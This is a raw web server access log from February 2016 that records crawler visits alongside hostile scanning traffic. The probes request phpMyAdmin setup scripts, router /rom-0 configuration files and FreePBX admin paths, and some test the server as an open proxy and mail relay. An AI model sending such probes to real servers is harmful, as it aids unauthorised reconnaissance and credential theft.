89.248.174.4 - - [26/Feb/2016:00:29:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.174.4 - - [26/Feb/2016:00:41:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.174.4 - - [26/Feb/2016:00:44:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.174.4 - - [26/Feb/2016:00:53:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
187.130.254.197 - - [26/Feb/2016:00:57:47 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
187.130.254.197 - - [26/Feb/2016:00:58:07 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
187.130.254.197 - - [26/Feb/2016:00:58:27 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
89.248.174.4 - - [26/Feb/2016:00:59:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.174.4 - - [26/Feb/2016:01:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
157.55.39.3 - - [26/Feb/2016:01:31:13 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.3 - - [26/Feb/2016:01:31:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)"
89.248.174.4 - - [26/Feb/2016:01:34:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
157.55.39.106 - - [26/Feb/2016:01:39:17 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
115.231.222.14 - - [26/Feb/2016:01:57:59 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2911055989756172 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
89.248.174.4 - - [26/Feb/2016:02:06:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.87.98 - - [26/Feb/2016:02:08:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.174.4 - - [26/Feb/2016:02:12:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.174.4 - - [26/Feb/2016:02:21:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
5.39.222.159 - - [26/Feb/2016:02:49:21 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
5.39.222.159 - - [26/Feb/2016:03:32:45 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
60.209.5.30 - - [26/Feb/2016:03:39:13 +0100] "GET http-req HTTP/1.1" 400 330 "-" "Mozilla/5.0 zgrab/0.x"
115.231.222.14 - - [26/Feb/2016:04:12:48 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0035304421044274 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [26/Feb/2016:04:12:49 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0593039250929325 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [26/Feb/2016:04:12:49 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6581158707811037 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [26/Feb/2016:05:44:06 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8758689240527179 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
111.248.62.190 - - [26/Feb/2016:05:51:39 +0100] "CONNECT 163mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
61.231.7.201 - - [26/Feb/2016:05:58:34 +0100] "CONNECT vip163mx00.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
104.192.0.18 - - [26/Feb/2016:06:16:53 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
